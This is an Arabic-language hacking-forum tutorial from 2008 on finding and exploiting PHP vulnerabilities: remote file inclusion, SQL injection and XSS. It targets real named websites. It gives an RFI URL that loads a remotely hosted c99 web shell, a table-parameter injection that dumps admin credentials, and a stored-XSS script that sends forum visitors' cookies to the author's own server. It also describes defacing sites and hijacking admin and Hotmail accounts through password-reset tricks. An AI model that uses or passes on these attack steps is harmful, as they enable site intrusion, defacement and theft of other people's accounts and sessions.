--------------------------------------------------------------------------------
#############################
الثغـرآت واسغلالهـآ والبحث عنهـآ ..
#############################
################################################## ###
ما هي الثغرات ؟؟
الثغره هي عباره عن خطأ برمجي يمكننا استغلاله في أن نجعل النظام يقوم بتنفيذ أوامرنا التي نعطيها إليه
مثلاً فيه سكريبت مبرمج بالـ php عنده أمر لإدراج بيانات أسماء الأعضاء
الحين أنا أمسك هالملف واطالع فيه فحصته لقيته عادي ينفذ الأمر اللي هو قراءة بيانات الأعضاء
لاحظت فيه خطأ برمجي أقدر من خلاله بدل ما أخلي السكريبت يسوي ادراج لبيانات الأعضاء
خليته يعمل إدراج لملف شيل ^_^ وهذي ثغره نسميها File Include
ومن الشيل عاد انتم تعرفون خطورته ووش نقدر نسوي فيه .. الخ
وهكذا ..
################################################## ###
ما هي انواع الثغرات ؟؟
الثغراات كثيييييييره لاتعد ولا تحصى في أنواع كثيره من الأنظمه
حنا في هالكتاب راح نتطرق لثلاث أنواع أساسية في نظام الـ php
وهي
1-File Include(ادراج ملف)
2-Sql Injection(تنفيذ أوامر في قاعدة البيانات)
3-XSS(تستخدم لسرقة الكوكيز سواء للمنتدى أو لسكريبت أو لأي برنامج)
=-=
النوع الأول
هو أخطر أنواع الثغرات ويسري عبر أخطاء برمجية مما يجعل الهكر
يقوم بإدراج ملف شيل خطير يمكنه من التلاعب بالموقع واختراقه وأعتقد الكل يعرف وش هو
وان شاء الله قريب بنزل كتاب عن الروت يعني من خلال هالشيل تقدر تسطير على السيرفر كآمل
بكل مواقعه
-
النوع الثاني
وهذا أقل خطورة من الفايل انكلود ويقوم عبر أخطاء برمجية بإرسال أوامر إلى قاعدة البيانات
مثلاً أمر لقراءة معلومات عضوية الأدمن رقم واحد أو أمر لتغيير كلمة مروره وتقدر تستغلها بأشياء كثير
كمثال
ثغرة sqlمن خلالها نفذنا أمر يقوم بتغيير ايميل عضوية المدير العام للسكريبت المصاب بالثغره
فقمنا بتغيير ايميله مثلاً الى ايميلي
ProfessionaL55@hotmail.com ثم اروح للسكريبت واسوي نسيت كلمة المرور
وراح يرسلها لايميلي وبكذا نخترق عضوية المدير العام وندخل لوحة التحكم للسكريبت
وأحلى اندكس اختراق ننزله وبعض السكريبت نقدر نرفع شيل من لوحة التحكم وهكذا ..
-
النوع الثالث
يعتبر أقل خطورة من الأول والثاني وأكيد الكل سمع في هالنوع من الثغرات وحربها
وأقرب مثال ثغرات الـxssفي موقع الهوتميل
وهذي الثغرات من خلالها نقدر نسحب كوكيز أي عضو بالموقع مثل الهوتميل لكن تعتبر أقل خطورة
في استغلالها لأنها ممكن تدخلنا مثلاً بعضوية المدير العام كمثال في المنتدى
بس هنا خطورتها ضعيفه لأننا لو دخلنا ما نعرف الباس ولو نبي نعرف الباس وش نسوي ؟
لازم نغير الايميل لو دخلنا وغيرنا الايميل ما يتغير لاحظت انه يقول لي دخل الباس القديم وانا معرفه
لأني داخل عن طريق الكوكيز هنا ما نقدر نستغلها في شي *_^
وكذلك الهوتميل دخلنا وقلنا نبي نغير كلمة المرور بالكوكيز يقول ما تقدر تغيرها لازم تعرف القديمه
فكرنا وعرفنا حركه وهي اننا نروح للهوتميل ونقول له نسينا كلمة المرور ويرسل الرابط للانبوكس
وراح نفتحه ونغير كلمة المرور وهكذا ..
وتختلف خطورة هالنوع من الثغرات من سكريبت إلى آخر
################################################## ###
كيفية البحث عن الثغرات ؟؟
موضوع حلو صح ^_^ ايه أكيد حلو لأني أول واحد أحتاجه قبلكم والحمد لله ارتحت منه باقي انتم ترتاحون
رآح نشرح كيف نبحث عن الثغرات في المواقع التالية :-
www.securityfocus.comwww.securityreason.comwww.milw0rm.comwww.google.com=-=
نمسكها وااحد وااحد ويالله بسم الله
ادخلوا هنا
www.securityfocus.comبعد ما تدخلوا الموقع
شوفوا الصوره :-
بعدها تلاحظ طلع لنا جدول بآخر الثغرات مرتبة تحت بعض
وبهالشكل :-
وبكذا والحمد لله عرفنا كيف نطلع آخر الثغرات
لو مثلاً نبحث عن ثغرات سكريبت معين بالموقع
شووف في نفس الموقع هذا
طآلع فوق تلقى مربع اكتب فيه اسم السكريبت
تمام دلوقتى لاحظوا طلع لنا كل ثغرات سكريبت الـ Vb شوفوا الصورة :-
الحمد لله كذا انتهينا من طريقة البحث عن الثغرات الحين بمجرد الضغط عليها
دلوقتى هيطلع لك استغلالها وكل شي واكمال شرحها بالدرس التالي بإذن الله
=-=
طيب لو ما لقينا اللي الى احنا عاوزينه في الموقع اللي دخلناه فوق
نجرب في هالموقع
www.securityreason.comلو انتا عاوز تشووف آخر الثغرات المكتشفة
شووف الصورة :-
ثم هيطلع لنا آخر الثغرات ومجرد الضغط على اسمها سيتم عرض كل معلوماتها مع استغلالها
طيب لواحنا عاوزين نبحث عن ثغرات سكريبت معين الطريقة كالتالي :-
ثم
ثم نضغط ور Ok وسيتم البحث وإحضار كل المعلومات بإذن الله
=-=
طيب لو جربنا الموقعين اللي فوق وما عجبنا ولا واحد فيهم ولا لقينا اللي نبيه
نجرب هالموقع
www.milw0rm.comهذا آخر الثغرات تطلع في الصفحة الرئيسية للموقع
واذا تبي تبحث عن ثغرات سكريبت معين شوف الصورة :-
ثم راح تطلع لك النتائج بالشكل التالي :-
وبكذا والحمد لله شرحنا على موقع ميل ورم
=-=
ولو بعد هذا ما لقينا اللي نبيه في المواقع اللي فوق
نسخدم حبيبنا القوقل
www.google.comادخل واكتب اسم السكريبت وشووف أخباره وثغراته وكل شي عنه
وبإذن الله بيطلع لك كل شي عن السكريبت
واقراا وخذ لك كوووفي ومخمخ على رااحتك وأقل من راحتك لأن أهم شي في الهكر
وبالأخص مكتشفي الثغرات يكونون على راحة تاامة وصبورين وان شاء الله يوصلون لهدفهم
=-=
وذي هذا الدرس نكون عرفنا بإذن الله كيف ندور على آخر الثغرات وثغرات سكريبتات معينه
الدرس التالي راح يكون لكيفية استغلال هذه الثغرات بإذن الله
################################################## ###
كيفية استغلال الثغرات ؟؟
هذا موضوع مهم ودقيق شوي
راح نشرح استغلال 3 أنواع قووية ومهمة من الثغرات شرحناها في درس سابق وهي :-
وهي
1-File Include(ادراج ملف)
2-Sql Injection (تنفيذ أوامر في قاعدة البيانات)
3-XSS(تستخدم لسرقة الكوكيز سواء للمنتدى أو لسكريبت أو لأي برنامج)
أعتقد اني شرحتها في درس أنواع الثغرات وفصلتها بالتفصيل الممل والحمد لله
=-=
وراح نشرح كل ثغره مع طريقة استغلالها بإذن الله
ونبدأ أول شي
شوفوا هالثغره لقيتها بمواقع السكيورتي :-
شوف طآل عمرك الثغره هذي وترجمتها
اسم السكريبت المصاب + اصدار السكريبت المصاب : WebMatic 2.6
نوع الثغره : File Include
هذا أهم شي في السطر كله وبس
اضغط عليها لرؤيتها وهذا رابط الثغره شوفها :-
http://securityreason.com/exploitalert/1911شوف طآل عمرك راح أفصل الصفحه لك ان شاء الله شووف
ثم انزل تحت شووي وبتشووف التالي :-
يقول لك طآل عمرك ان فيه خطئين في السكريبت
يعني في السكريبت ثغرتين و Error معناها خطأ
شوف وش يقول لك
Error1 : require($P_INDEX."lib_album.php");
هذا الخطأ البرمجي الأول في السكريبت وسبب لنا ثغرة الفايل انكلود الأولى
وهذا الخطأ الثاني
Error2 : require($P_INDEX."page_album.inc");
وهذي ثغرة ثانية بعد في السكريبت عبارة عن خطأ برمجي أدى الى تكوين ثغرة فايل انكلود ثانية
يعني السكريبت الحين فيه ثغرتين فايل انكلود يا بلاش *_^
وشووف هالأسطر :-
[[RFI]]
http://[target]/[path]/core/index/index_album.php?P_LIB=[****l]http://[target]/[path]/core/index/index_album.php?P_INDEX=[****l]هذي استغلال الثغرتين طآل عمرك
[target] = هنا نكتب رابط الموقع اللي عليه السكريبت
[path] = هنا نكتب اسم المجلد اللي عليه السكريبت مثل المنتدى ( vb )
اللي باللون الزيتي هذا امتداد الثغره وطريقة استغلالها
[****l] = هنا اكتب رابط شيل انت رافعه على أي موقع ثاني بامتداد (txt)
وهذا الاستغلال كامل الحين روح دور أي موقع بقوقل مركب اصدار WebMatic 2.6
وطبق عليه هالثغره وادعسه
وهذا مثال على موقع مصاب :-
http://www.castillosprayers.com/web/core/index/index_album.php?P_INDEX=http://lecopra.xoompages.com/safe.txt?اللي باللون الأحمر هذا رابط شيل ch99 انا رافعه على موقع ثاني ولاتنسى علامة الاستفهام
لازم تكتبها ضروري في آخر الشيل بعد كلمة txt
الحين وش راح يصير بعد ما شغلنا هالاستغلال
ثغرة الـ File Include تعني ادراج ملف
اللي راح يصير الحين ان السكريبت راح يسوي ادراج لملف الشيل من الرابط اللي حطيناه في الاستغلال
لداخل الموقع اللي عليه السكريبت وبكذا حنا معنا شيل على الموقع عاد
الحين انت سو العجب والعجااب
انا رفعت اندكس عالموقع لأن صلاحيتي كانت user
وهذا التسجيل بالزون اتش
http://www.zone-h.org/index2.php?option=com_mirrorwrp&Itemid=43&id=53992 61
وبكذا الحمد لله انتهينا من شرح استغلال ثغرة الـ File Include
ملاحظه كان الاستغلال على موقع نصراني اللي فوق *_^
=-=
ننتقل الحين لشرح ثغرة Sql Injection
دلوقتى أشرح على ثغرة sql انجكشن في سكريبت سجل الزوار وفيه أكثر من ثغره
راح نشرحها بجميع أنواعها
قبل ما أبدأ لازم يكون عندك نسخة من السكريبت اللي تبي تسوي عليه الثغره
أو عندك الكود أو الخطأ البرمجي اللي فيه الثغره
شوفوا هالثغره :-
http://xxx/gb/show.php?do=show&table=hhhالخطأ البرمجي :-
$result=mysql_query("SELECT * FROM ".$table." order by id DESC") or die(mysql_error());
تلاحظون المتغير $table هذا داخل الاستعلام وطبعاً تعرفون انتم
ان أي كود برمجي يحتوي $table ومدعم بهالسطر :-
$table=$_GET['table'];
يعني الزائر يقدر يستبدل قيمة table بأي كلمة أو أي شي
وهذي ثغره في هالمكان
شوفوا الاستغلال :-
http://xxx/gb/show.php?do=show&table=hhhيعني احنا دلوقتى نقدر نختار قيمة لـ table وانا كتبت hhh
يطلع لنا خطأ يقول لنا الجدول hhh غير موجود في قاعدة البيانات يعني الثغره شغاله 100%
كل اللي علينا نستدعي جدول admin كذا :-
http://localhost/gb/show.php?do=show&table=adminوسوي تشغيل تلاحظ انه أظهر لنا اسم المستخدم وكلمة مرور المدير العام
من قاعدة البيانات أو بالأصح أظهر لنا محتوى قالب الـ admin
ونقدر نستغله
بأي استغلال على راحتك أي قالب تبيه استعديه مثلا
http://localhost/gb/show.php?do=show&table=mailهذي بداية بسيطه في هالنوع من الثغرات يبي لها خبره وواحد مبرمج php
لا تتعامل معها بشكل كبير اذا مالك خبره فيها
اذا تعلمت الفايل انكلود اللي فوق والـ xss وأتقنتهم
وحبيت تتعلم الـ sql حآول تبحث عن كتب وتقرا كثير عنها
والله الموفق ان شاء الله
=-=
طيب دلوقتى عرفنا الفايل انكلود وعرفنا مقدمه بسطه عن ثغرات sql انجكشن
الحين نشرح ثغرات xss
ونااخذ لنا ثغرة xss بالاهداءات في المنتديات
والتطبيق على :-
http://www.3rbgirl.com/vb/index.phpادخل وسجل بالمنتدى طآل عمرك
أنا سجلت
والحمد لله
=-=
على فكرة الثغره لازم نطبقها بشريط الاهداءات
لازم نكتب عشر اهدائات
=-=
المهم شاركت 10 مشاركات
>> كنه جاب شي جديد
شاركنا عشر مشاركات نروح نعمل اضافة اهدااء
ثم اكتب دولتك اكتب مصر اوى اى حاجه اكتب مثلا ويب سايت
محتوى الاهداء اكتب :
قبل نعمل محتوى الاهداء وقف هنا اترك كل الشاشات مفتوحة
شوف مجلد الشرح هذا تلقى مجلد مرفق معه اسمه log
ادخل المجلد راح تلقى هالملفين
الملفين دول راح تستخدمهم في كل ثغرات الـ xss واللي جرب ثغرة الهوتميل يفهم وش أقصد
المهم طآل عمرك لازم يكون عندك موقع أو مساحه مجانية على أي استضافة مجانية
أو حتى مدفووعة
وانا على سبيل المثال عندي
www.hack15.comلازم ترفع الملفات على موقعك وأنا أفضل استخدام برنامج الـ FTP
ارفع مجلد log على مساحتك
وانا على مساحتي على راح يكون تطبيقي كذا
www.hack15.com/log/حلو تمام دلوقتى شووف الملفين
cooc2.php >> الملف ده ارفعه داخل مجلد log في موقعك بدون أي تعديل
اما ملف cooc1.js
حرره ببرنامج المفكره
المهم بعد ما عملناا موافق راح يحرر الملف لنا بالمفكره
اذا كان جهازك عربي اضغط على الكيبورد Ctrl+Shift اللي في أيسر الكيبورد عشان نقلب المفكرة
على الجهة اليسرى عشان نكتب بدون أخطاء وأسهل ^_^
شووف الصورة :-
تمام الحين استبدل
www.xxx.comبرابط مسااحتك
انا راح استبدلها برابط مساحتي الناتج كذا
www.hack15.comثم سوي حفظ
ثم ارفع ملف coc1.js
الى ملف log بالموقع
تمام الحين أعطي ملف log التصريح 777
حلو تمام الحين انتهينا من هالخطوه والحمد لله
=-=
الحين نقدر نسوي أي ثغرة xss بسهوله
نستخدم استغلال الثغره ونستبدل رابط سرقة الكوكيز برابطنا
مثلاً
هذي ثغرة الكوكيز
تكتب في محتوى اهداءك هالكود :-<Script>location.href="http://www.hack15.com/log/cooc2.php"+********.coockie</Script>
استبدل اللي باللون الأصفر برابط موقعك او مساحتك واعتمد الكود في الاهداءات
وروح ناام لووول
الحين أي واحد يشوف الاهداءات من الأعضاء أو بالأصح يطب المنتدى ^_^ راح ينسرق كوكيزه
ادخل مجلد log في موقعك تلقى ملف xss.htm
داخله تلقى كل الكوكيزات القط كوكيز المدير العام وأحلى اختراق
وفيه ثغرات تكون في عنوان الموقع
مثل الهوتميل
استغلالها يختلف بشوي لكن أهم شي الملفات تكون عندك
يعني مجرد تعرف الثغره بس تضيف رابط اللوق تبعك واخترق لووووول
كيف تستغل الكوكيز طبعاً يختلف من ثغره لأخرى الهوتميل
والحمد لله كذا استغلينا ثلاث أنواع الثغرات أخطر ثغرات الـ php
الحمد الله الذى وفقنى :$:
موضوع: الثغـرآت واسغلالهـآ والبحث عنهـآ .. 
الإثنين ديسمبر 01, 2008 8:26 am